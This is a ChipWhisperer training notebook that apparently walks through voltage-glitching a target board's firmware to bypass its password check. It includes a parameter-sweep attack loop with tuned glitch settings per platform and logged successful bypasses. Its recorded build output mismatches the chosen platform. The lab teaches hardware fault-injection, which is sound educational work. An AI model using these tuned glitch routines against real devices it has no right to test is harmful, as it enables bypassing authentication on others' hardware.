# Part 2, Topic 2: Voltage Glitching to Bypass Password

---
NOTE: This lab references some (commercial) training material on [ChipWhisperer.io](https://www.ChipWhisperer.io). You can freely execute and use the lab per the open-source license (including using it in your own courses if you distribute similarly), but you must maintain notice about this source location. Consider joining our training course to enjoy the full experience.

---

**SUMMARY:** *We've seen how voltage glitching can be used to corrupt calculations, just like clock glitching. Let's continue on and see if it can also be used to break past a password check.*

**LEARNING OUTCOMES:**

* Applying previous glitch settings to new firmware
* Checking for success and failure when glitching

## Firmware

Again, we've already covered this lab, so it'll be mostly up to you!

In [1]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEARM'
SS_VER = 'SS_VER_2_1'

In [2]:
%run "../../Setup_Scripts/Setup_Generic.ipynb"

INFO: Found ChipWhisperer😍


In [3]:
%%bash -s "$PLATFORM" "$SS_VER"
cd ../../../hardware/victims/firmware/simpleserial-glitch
make PLATFORM=$1 CRYPTO_TARGET=NONE SS_VER=$2

SS_VER set to SS_VER_2_1
C:/Users/adewa/Documents/avr-gcc-11.1.0-x64-windows/avr-gcc-11.1.0-x64-windows/bin/make clean_objs .dep 
make[1]: Entering directory 'C:/Users/adewa/code/chipwhisperer/hardware/victims/firmware/simpleserial-glitch'
SS_VER set to SS_VER_2_1
rm -f -- simpleserial-glitch-CWLITEXMEGA.hex
rm -f -- simpleserial-glitch-CWLITEXMEGA.eep
rm -f -- simpleserial-glitch-CWLITEXMEGA.cof
rm -f -- simpleserial-glitch-CWLITEXMEGA.elf
rm -f -- simpleserial-glitch-CWLITEXMEGA.map
rm -f -- simpleserial-glitch-CWLITEXMEGA.sym
rm -f -- simpleserial-glitch-CWLITEXMEGA.lss
rm -f -- objdir-CWLITEXMEGA/*.o
rm -f -- objdir-CWLITEXMEGA/*.lst
rm -f -- simpleserial-glitch.s simpleserial.s XMEGA_AES_driver.s uart.s usart_driver.s xmega_hal.s
rm -f -- simpleserial-glitch.d simpleserial.d XMEGA_AES_driver.d uart.d usart_driver.d xmega_hal.d
rm -f -- simpleserial-glitch.i simpleserial.i XMEGA_AES_driver.i uart.i usart_driver.i xmega_hal.i
make[1]: '.dep' is up to date.
make[1]: Leaving directory

In [4]:
fw_path = "../../../hardware/victims/firmware/simpleserial-glitch/simpleserial-glitch-{}.hex".format(PLATFORM)
cw.program_target(scope, prog, fw_path)
if SS_VER=="SS_VER_2_1":
    target.reset_comms()

XMEGA Programming flash...
XMEGA Reading flash...
Verified flash OK, 2523 bytes


In [5]:
if PLATFORM == "CWLITEXMEGA":
    scope.clock.clkgen_freq = 32E6
    if SS_VER=='SS_VER_2_1':
        target.baud = 230400*32/7.37
    else:
        target.baud = 38400*32/7.37
    def reboot_flush():            
        scope.io.pdic = False
        time.sleep(0.1)
        scope.io.pdic = "high_z"
        time.sleep(0.1)
        #Flush garbage too
        target.flush()
else:
    scope.clock.clkgen_freq = 24E6
    if SS_VER=='SS_VER_2_1':
        target.baud = 230400*24/7.37
    else:
        target.baud = 38400*24/7.37
    time.sleep(0.1)
    def reboot_flush():            
        scope.io.nrst = False
        time.sleep(0.05)
        scope.io.nrst = "high_z"
        time.sleep(0.05)
        #Flush garbage too
        target.flush()

In [6]:
#Do glitch loop
reboot_flush()
pw = bytearray([0x74, 0x6F, 0x75, 0x63, 0x68])
target.simpleserial_write('p', pw)

val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10)#For loop check
valid = val['valid']
if valid:
    response = val['payload']
    raw_serial = val['full_response']
    error_code = val['rv']

print(val)

{'valid': True, 'payload': bytearray(b'\x01'), 'full_response': bytearray(b'\x00r\x01\x01\xd4\x00'), 'rv': bytearray(b'\x00')}


In [7]:
scope.glitch.clk_src = "clkgen" # set glitch input clock
scope.glitch.output = "glitch_only" # glitch_out = clk ^ glitch
scope.glitch.trigger_src = "ext_single" # glitch only after scope.arm() called
if PLATFORM == "CWLITEXMEGA":
    scope.io.glitch_lp = True
    scope.io.glitch_hp = True
elif PLATFORM == "CWLITEARM":
    scope.io.glitch_lp = True
    scope.io.glitch_hp = True
elif PLATFORM == "CW308_STM32F3":
    scope.io.glitch_hp = True
    scope.io.glitch_lp = True

In [8]:
import matplotlib.pylab as plt
import chipwhisperer.common.results.glitch as glitch
gc = glitch.GlitchController(groups=["success", "reset", "normal"], parameters=["width", "offset", "ext_offset"])
gc.display_stats()

IntText(value=0, description='success count:', disabled=True)

IntText(value=0, description='reset count:', disabled=True)

IntText(value=0, description='normal count:', disabled=True)

FloatSlider(value=0.0, continuous_update=False, description='width setting:', disabled=True, max=10.0, readout…

FloatSlider(value=0.0, continuous_update=False, description='offset setting:', disabled=True, max=10.0, readou…

FloatSlider(value=0.0, continuous_update=False, description='ext_offset setting:', disabled=True, max=10.0, re…

In [9]:
from importlib import reload
import chipwhisperer.common.results.glitch as glitch
from tqdm.notebook import tqdm
import re
import struct
gc.set_range("ext_offset", 0, 41)
g_step = 0.4

#disable logging
cw.set_all_log_levels(cw.logging.CRITICAL)

if PLATFORM=="CWLITEXMEGA":
    gc.set_range("width", 46.1, 47.8)
    gc.set_range("offset", -20, 20)
    scope.glitch.repeat = 10
    gc.set_range("ext_offset", 0, 15)
elif PLATFORM == "CWLITEARM":
    #should also work for the bootloader memory dump
    gc.set_range("width", 34.7, 36)
    gc.set_range("offset", 15, 18)
    scope.glitch.repeat = 7
elif PLATFORM == "CW308_STM32F3":
    #these specific settings seem to work well for some reason
    #also works for the bootloader memory dump
    gc.set_range("ext_offset", 11, 31)
    gc.set_range("width", 47.6, 49.6)
    gc.set_range("offset", -19, -21.5)
    scope.glitch.repeat = 5




gc.set_global_step(g_step)
scope.adc.timeout = 0.1

reboot_flush()
sample_size = 1
successes = 0

for glitch_settings in gc.glitch_values():
    scope.glitch.offset = glitch_settings[1]
    scope.glitch.width = glitch_settings[0]
    scope.glitch.ext_offset = glitch_settings[2]
    for i in range(sample_size):
        if scope.adc.state:
            # can detect crash here (fast) before timing out (slow)
            #print("Trigger still high!")
            gc.add("reset", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))
            reboot_flush()

        scope.arm()
        target.simpleserial_write('p', bytearray([0]*5))
        scope.io.glitch_hp = False
        scope.io.glitch_hp = True
        scope.io.glitch_lp = False
        scope.io.glitch_lp = True
        ret = scope.capture()


        if ret:
            #print('Timeout - no trigger')
            gc.add("reset", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))

            #Device is slow to boot?
            reboot_flush()

        else:
            val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10, timeout=50)#For loop check
            if val['valid'] is False:
                gc.add("reset", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))
            else:
                if val['payload'] == bytearray([1]): #for loop check
                    successes +=1 
                    gc.add("success", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))
                    print(val)
                    print(val['payload'])
                    print(scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset)
                    print("🐙", end="")
                else:
                    gc.add("normal", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))
                    
    if successes > 0:
        break
                    
#reenable logging
cw.set_all_log_levels(cw.logging.WARNING)

{'valid': True, 'payload': bytearray(b'\x01'), 'full_response': bytearray(b'\x00r\x01\x01\xd4\x00'), 'rv': bytearray(b'\x00')}
bytearray(b'\x01')
46.09375 -19.140625 0
🐙{'valid': True, 'payload': bytearray(b'\x01'), 'full_response': bytearray(b'\x00r\x01\x01\xd4\x00'), 'rv': bytearray(b'\x00')}
bytearray(b'\x01')
46.09375 -18.359375 0
🐙{'valid': True, 'payload': bytearray(b'\x01'), 'full_response': bytearray(b'\x00r\x01\x01\xd4\x00'), 'rv': bytearray(b'\x00')}
bytearray(b'\x01')
46.09375 -17.96875 1
🐙{'valid': True, 'payload': bytearray(b'\x01'), 'full_response': bytearray(b'\x00r\x01\x01\xd4\x00'), 'rv': bytearray(b'\x00')}
bytearray(b'\x01')
46.09375 -17.578125 10
🐙{'valid': True, 'payload': bytearray(b'\x01'), 'full_response': bytearray(b'\x00r\x01\x01\xd4\x00'), 'rv': bytearray(b'\x00')}
bytearray(b'\x01')
46.09375 -11.71875 1
🐙{'valid': True, 'payload': bytearray(b'\x01'), 'full_response': bytearray(b'\x00r\x01\x01\xd4\x00'), 'rv': bytearray(b'\x00')}
bytearray(b'\x01')
46.09375 -

KeyboardInterrupt: 

In [ ]:
scope.dis()
target.dis()

In [ ]:
assert successes >= 1